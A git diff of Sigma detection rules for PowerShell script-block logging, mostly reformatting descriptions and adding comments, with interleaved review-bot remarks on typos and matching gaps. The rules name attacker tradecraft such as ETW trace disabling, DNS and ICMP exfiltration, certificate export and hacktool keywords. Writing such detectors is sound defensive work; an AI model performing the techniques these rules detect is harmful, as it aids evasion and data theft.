index 3a416f3ce..0f8aefa52 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml
@@ -1,8 +1,8 @@
 title: Disable of ETW Trace - Powershell
 id: 115fdba9-f017-42e6-84cf-d5573bf2ddf8
 related:
- - id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
- type: derived
+ - id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
+ type: derived
 status: test
 description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
 references:
@@ -25,9 +25,9 @@ detection:
 Channel:
 - Microsoft-Windows-PowerShell/Operational
 - PowerShellCore/Operational
- selection_pwsh_remove:
+ selection_pwsh_remove: # Autologger provider removal
 ScriptBlockText|contains: 'Remove-EtwTraceProvider '
- selection_pwsh_set:
+ selection_pwsh_set: # Provider “Enable” property modification
 ScriptBlockText|contains|all:
 - 'Set-EtwTraceProvider '
 - '0x11'
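Review bot: `'0x11'` in `selection_pwsh_set` only matches the hexadecimal spelling of the property value; `Set-EtwTraceProvider ... -Property 17` is the same call in decimal and would not fire, and the new comment `# Provider “Enable” property modification` does not say what `0x11` is or why it was chosen. Presumably it is EVENT_ENABLE_PROPERTY_SID (0x1) combined with EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0 (0x10), the autologger-tampering value from the referenced technique (the `references:` list is outside this hunk, so confirm there); a comment such as `# 0x11 = EnableProperty with IGNORE_KEYWORD_0 (0x10) set, which silences keyword-0 events from the provider; the decimal form 17 is not covered` would let the next maintainer judge the gap. Prefer ASCII quotes in the comment (`"Enable"`) so the rule file stays free of non-ASCII characters that some tooling mangles.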
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml b/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
index 76fd0d56c..f73e2fb1f 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
@@ -1,8 +1,7 @@
 title: Suspicious PowerShell Mailbox SMTP Forward Rule
 id: 15b7abbb-8b40-4d01-9ee2-b51994b1d474
 status: test
-description: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP
- forwarding rule.
+description: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.
 references:
 - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
 author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml b/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml
index ec4e7ec10..cd9b9de8f 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml
@@ -1,12 +1,10 @@
 title: Certificate Exported Via PowerShell - ScriptBlock
 id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c
 related:
- - id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb
- type: similar
+ - id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb
+ type: similar
 status: test
-description: Detects calls to cmdlets inside of PowerShell scripts that are used to
- export certificates from the local certificate store. Threat actors were seen
- abusing this to steal private keys from compromised machines.
+description: Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
 references:
 - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a
 - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate
@@ -35,7 +33,6 @@ detection:
 ScriptBlockText|contains: CmdletsToExport = @(
 condition: ps_script and (selection and not 1 of filter_optional_*)
 falsepositives:
- - Legitimate certificate exports by administrators. Additional filters might be
- required.
+ - Legitimate certificate exports by administrators. Additional filters might be required.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml b/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml
index 19eb9ac58..c52871bf0 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml
@@ -1,12 +1,10 @@
 title: Suspicious FromBase64String Usage On Gzip Archive - Ps Script
 id: df69cb1d-b891-4cd9-90c7-d617d90100ce
 related:
- - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f
- type: similar
+ - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f
+ type: similar
 status: test
-description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script.
- This technique is often used as a method to load malicious content into memory
- afterward.
+description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml
index 908a7f5fb..b03f19181 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml
@@ -1,16 +1,10 @@
 title: Service Registry Permissions Weakness Check
 id: 95afc12e-3cbb-40c3-9340-84a032e596a3
 status: test
-description: 'Adversaries may execute their own malicious payloads by hijacking the
- Registry entries used by services.
-
- Adversaries may use flaws in the permissions for registry to redirect from the
- originally specified executable to one that they control, in order to launch their
- own code at Service start.
-
+description: |
+ Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
+ Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
 Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
-
- '
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness
 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml
index 9a3c9649f..160cc699c 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml
@@ -1,8 +1,7 @@
 title: Active Directory Computers Enumeration With Get-AdComputer
 id: 36bed6b2-e9a0-4fff-beeb-413a92b86138
 status: experimental
-description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties
- within Active Directory.
+description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.
 references:
 - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml
index 627067cb9..e826056b7 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml
@@ -1,8 +1,7 @@
 title: Active Directory Group Enumeration With Get-AdGroup
 id: 8c3a6607-b7dc-4f0d-a646-ef38c00b76ee
 status: test
-description: Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within
- Active Directory
+description: Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml
index 4de38be7b..0afcd428f 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml
@@ -1,13 +1,9 @@ title: Suspicious Get-ADReplAccount id: 060c3ef1-fd0a-4091-bf46-e7d625f60b73 status: test -description: 'The DSInternals PowerShell Module exposes several internal features - of Active Directory and Azure Active Directory. - - These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, - password auditing, DC recovery from IFM backups and password hash calculation. - - ' +description: | + The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. + These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. references: - https://www.powershellgallery.com/packages/DSInternals - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml index bb9795098..bfa95e508 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml 
@@ -1,16 +1,10 @@ title: Automated Collection Bookmarks Using Get-ChildItem PowerShell id: e0565f5d-d420-4e02-8a68-ac00d864f9cf status: test -description: 'Adversaries may enumerate browser bookmarks to learn more about compromised - hosts. - - Browser bookmarks may reveal personal information about users (ex: banking sites, - interests, social media, etc.) as well as details about - - internal network resources such as servers, tools/dashboards, or other related - infrastructure. - - ' +description: | + Adversaries may enumerate browser bookmarks to learn more about compromised hosts. + Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about + internal network resources such as servers, tools/dashboards, or other related infrastructure. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml index 094746792..5d645f4c3 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml 
@@ -1,14 +1,9 @@ title: Security Software Discovery Via Powershell Script id: 904e8e61-8edf-4350-b59c-b905fc8e810c status: experimental -description: 'Detects calls to "get-process" where the output is piped to a "where-object" - filter to search for security solution processes. - - Adversaries may attempt to get a listing of security software, configurations, - defensive tools, and sensors that are installed on a system or in a cloud environment. - This may include things such as firewall rules and anti-virus - - ' +description: | + Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. + Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell author: frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems) @@ -42,6 +37,8 @@ detection: - Product -like selection_keywords: ScriptBlockText|contains: + # Note: These strings are using wildcard assuming the search is using the "-like" operator. + # You can add specific variant with the actual process names to increase coverage - \*avira\* - \*carbonblack\* - \*cylance\* 
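Review bot: The comment added above `- \*avira\*` reads as if these entries were Sigma wildcards, but the backslash escapes make each `*` a literal character that the rule expects to see in the script text around a `-like` filter; a maintainer could "fix" the escaping and silently widen the match. I'd reword it so the intent is explicit: `# Note: The asterisks are escaped (\*) and match literally; they are expected in the script text because the "-like" operator uses them as wildcards.` The second comment line also has a typo, "specific variant" should be "specific variants". The selection_keywords list continues past the end of the hunk.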
@@ -53,10 +50,7 @@ detection: - \*virus\* condition: ps_script and (all of selection_*) falsepositives: - - False positives might occur due to the nature of the ScriptBlock being ingested - as a big blob. Initial tuning is required. - - As the "selection_cmdlet" is common in scripts the matching engine might slow - down the search. Change into regex or a more accurate string to avoid heavy - resource consumption if experienced + - False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required. + - As the "selection_cmdlet" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml index b8fde9228..c38a2cd99 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml @@ -1,11 +1,10 @@ title: HackTool - Rubeus Execution - ScriptBlock id: 3245cd30-e015-40ff-a31d-5cadd5f377ec related: - - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 - type: similar + - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 + type: similar status: experimental -description: Detects the execution of the hacktool Rubeus using specific command line - flags +description: Detects the execution of the hacktool Rubeus using specific command line flags references: - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml index d5a5d52da..ae08a7b09 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml 
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml @@ -1,13 +1,11 @@ title: HackTool - WinPwn Execution - ScriptBlock id: 851fd622-b675-4d26-b803-14bc7baa517a related: - - id: d557dc06-62e8-4468-a8e8-7984124908ce - type: similar + - id: d557dc06-62e8-4468-a8e8-7984124908ce + type: similar status: experimental -description: 'Detects scriptblock text keywords indicative of potential usge of the - tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - - ' +description: | + Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. author: Swachchhanda Shrawan Poudel date: 2023/12/04 references: @@ -48,7 +46,6 @@ detection: - WinPwn.ps1 condition: ps_script and selection falsepositives: - - As the script block is a blob of text. False positive may occur with scripts - that contain the keyword as a reference or simply use it for detection. + - As the script block is a blob of text. False positive may occur with scripts that contain the keyword as a reference or simply use it for detection. level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml b/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml index e7ca18bf0..c5ec421cb 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml 
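Review bot: The new block-scalar description still carries the typo "usge"; since the commit rewrites that line anyway it should read `Detects scriptblock text keywords indicative of potential usage of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.` The falsepositives hunk of the same file has a similar wording problem on the reflowed line, where "As the script block is a blob of text. False positive may occur" is a sentence fragment; `As the script block is a blob of text, false positives may occur with scripts that contain the keyword as a reference or simply use it for detection.` keeps the meaning.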
@@ -1,8 +1,7 @@ title: PowerShell Hotfix Enumeration id: f5d1def8-1de0-4a0e-9794-1f6f27dd605c status: test -description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed - hotfixes often used in "enum" scripts by attackers +description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers references: - https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml b/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml index 77ae18252..e67d04197 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml @@ -1,9 +1,7 @@ title: PowerShell ICMP Exfiltration id: 4c4af3cd-2115-479c-8193-6b8bfce9001c status: test -description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may - steal data by exfiltrating it over an un-encrypted network protocol other than - that of the existing command and control channel. +description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp author: Bartlomiej Czyz @bczyz1, oscd.community diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml b/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml index d3e315084..071d645c9 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml 
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml @@ -1,8 +1,8 @@ title: Import PowerShell Modules From Suspicious Directories id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab related: - - id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 - type: similar + - id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 + type: similar status: test description: Detects powershell scripts that import modules from suspicious directories references: @@ -32,6 +32,7 @@ detection: - Import-Module '$Env:Appdata\ - Import-Module $Env:Appdata\ - Import-Module C:\Users\Public\ + # Import-Module alias is "ipmo" - ipmo "$Env:Temp\ - ipmo '$Env:Temp\ - ipmo $Env:Temp\ diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml b/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml index f8523c59d..634140a25 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml @@ -1,11 +1,10 @@ title: Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript id: 975b2262-9a49-439d-92a6-0709cccdf0b2 related: - - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a - type: similar + - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a + type: similar status: test -description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" - to install unsigned AppX packages +description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages references: - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package - https://twitter.com/WindowsDocs/status/1620078135080325122 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml index d675ad246..da0fd1246 100644 
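Review bot: In the posh_ps_install_unsigned_appx_packages.yml hunk the reflowed description keeps "it's alias", which should be the possessive: `description: Detects usage of the "Add-AppxPackage" or its alias "Add-AppPackage" to install unsigned AppX packages`. Since the line is rewritten by this commit, fixing the wording here costs nothing.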
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml @@ -1,9 +1,7 @@ title: Execute Invoke-command on Remote Host id: 7b836d7f-179c-4ba4-90a7-a7e60afb48e6 status: test -description: Adversaries may use Valid Accounts to interact with remote systems using - Windows Remote Management (WinRM). The adversary may then perform actions as the - logged-on user. +description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml index 5453dddc7..822ff5c7d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml @@ -1,8 +1,7 @@ title: Powershell DNSExfiltration id: d59d7842-9a21-4bc6-ba98-64bfe0091355 status: test -description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS - request covert channel +description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh - https://github.com/Arno0x/DNSExfiltrator 
@@ -22,13 +21,13 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_cmdlet: - - ScriptBlockText|contains: Invoke-DNSExfiltrator - - ScriptBlockText|contains|all: - - ' -i ' - - ' -d ' - - ' -p ' - - ' -doh ' - - ' -t ' + - ScriptBlockText|contains: Invoke-DNSExfiltrator + - ScriptBlockText|contains|all: + - ' -i ' + - ' -d ' + - ' -p ' + - ' -doh ' + - ' -t ' condition: ps_script and selection_cmdlet falsepositives: - Legitimate script diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml index 171b01cf7..fc78b81b7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml @@ -3,7 +3,7 @@ id: 73e67340-0d25-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml index 40480a8d5..4ee15c62b 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml 
@@ -1,8 +1,7 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the following code block \u2014 +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -24,12 +23,12 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_iex: - - ScriptBlockText|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - ScriptBlockText|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - ScriptBlockText|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - ScriptBlockText|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - ScriptBlockText|re: \*mdr\*\W\s*\)\.Name - - ScriptBlockText|re: \$VerbosePreference\.ToString\( + - ScriptBlockText|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - ScriptBlockText|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - ScriptBlockText|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - ScriptBlockText|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - ScriptBlockText|re: \*mdr\*\W\s*\)\.Name + - ScriptBlockText|re: \$VerbosePreference\.ToString\( condition: ps_script and selection_iex falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml index cb86cea3b..6b99c42f0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml 
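Review bot: The reflowed description still ends in the literal characters `\u2014`; YAML only processes backslash escapes inside double-quoted scalars, so this plain scalar is stored verbatim and the "following code block" it points to is not in the rule at all. I'd drop the dangling reference and point at the source instead: `description: Detects all variations of obfuscated powershell IEX invocation code generated by the Invoke-Obfuscation framework (see the referenced Out-ObfuscatedStringCommand.ps1 lines for the originating code block)`. The selection_iex hunk further down only re-indents the regex list, so the detection logic is unchanged.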
@@ -3,7 +3,7 @@ id: 779c8c12-0eb1-11eb-adc1-0242ac120002
 status: test
 description: Detects Obfuscated use of stdin to execute PowerShell
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25)
 author: Jonathan Cheong, oscd.community
 date: 2020/10/15
 modified: 2022/12/03
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml
index a424a28be..3af9d8522 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml
@@ -3,7 +3,7 @@ id: 0adfbc14-0ed1-11eb-adc1-0242ac120002
 status: test
 description: Detects Obfuscated use of Environment Variables to execute PowerShell
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24)
 author: Jonathan Cheong, oscd.community
 date: 2020/10/15
 modified: 2022/12/02
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml
index 44abd46f9..b08d21b0e 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml
@@ -3,7 +3,7 @@ id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07
 status: test
 description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)
 author: Timur Zinniatullin, oscd.community
 date: 2020/10/18
 modified: 2022/11/29
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml
index a6d3fbf56..d804f7017 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml
@@ -3,7 +3,7 @@ id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0
 status: test
 description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)
 author: Timur Zinniatullin, oscd.community
 date: 2020/10/18
 modified: 2022/11/29
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml
index 1826f9639..6bb5ef638 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml
@@ -3,7 +3,7 @@ id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7
 status: test
 description: Detects Obfuscated Powershell via Stdin in Scripts
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)
 author: Nikita Nazarov, oscd.community
 date: 2020/10/12
 modified: 2022/11/29
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml
index 4b150329f..4e3d410d0 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml
@@ -3,7 +3,7 @@ id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0
 status: test
 description: Detects Obfuscated Powershell via use Clip.exe in Scripts
 references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)
 author: Nikita Nazarov, oscd.community
 date: 2020/10/09
 modified: 2022/11/29
